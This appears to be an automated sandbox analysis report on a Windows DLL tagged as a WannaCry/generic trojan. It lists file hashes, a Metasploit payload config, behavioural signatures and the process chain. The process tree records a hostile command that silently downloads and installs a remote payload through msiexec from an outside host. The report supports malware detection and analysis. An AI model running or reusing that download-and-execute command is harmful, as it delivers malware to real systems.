Analysis

  • max time kernel
    39s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    26-12-2020 20:16

General

  • Target

    WannaCry/HEUR.Trojan.Win32.Generic.fc4bb3140f35cc8abd681b63096e7b81.dll

  • Size

    5KB

  • MD5

    fc4bb3140f35cc8abd681b63096e7b81

  • SHA1

    0946eff5c8cb8bca76dc0702e15076a332929439

  • SHA256

    89c3af5318ed0d9de1f320f94152a6730a6a3cbef53593e2a23765da015132d9

  • SHA512

    8848e247ece3f51de90c35b93902b46ae4099f611a056b2cf4431f7251296939647f1b964b948a578cba2aa74b4b4123a7a2e05e696e9941eecdb3aebf11be29

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Use of msiexec (install) with remote resource 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\HEUR.Trojan.Win32.Generic.fc4bb3140f35cc8abd681b63096e7b81.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3732
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\HEUR.Trojan.Win32.Generic.fc4bb3140f35cc8abd681b63096e7b81.dll,#1
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:3444
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1288
        • C:\Windows\SysWOW64\msiexec.exe
          msiexec /i http://avip.okblcm.co:2650/abYDuh9tfbBfVYg7up.jpg /q
          4⤵
          • Use of msiexec (install) with remote resource
          • Suspicious use of AdjustPrivilegeToken
          PID:4036
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3068

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1288-3-0x0000000001035FB0-mapping.dmp
  • memory/3444-2-0x0000000000000000-mapping.dmp
  • memory/4036-4-0x0000000000000000-mapping.dmp
  • memory/4036-5-0x0000000004EC0000-0x0000000004EC4000-memory.dmp
    Filesize

    16KB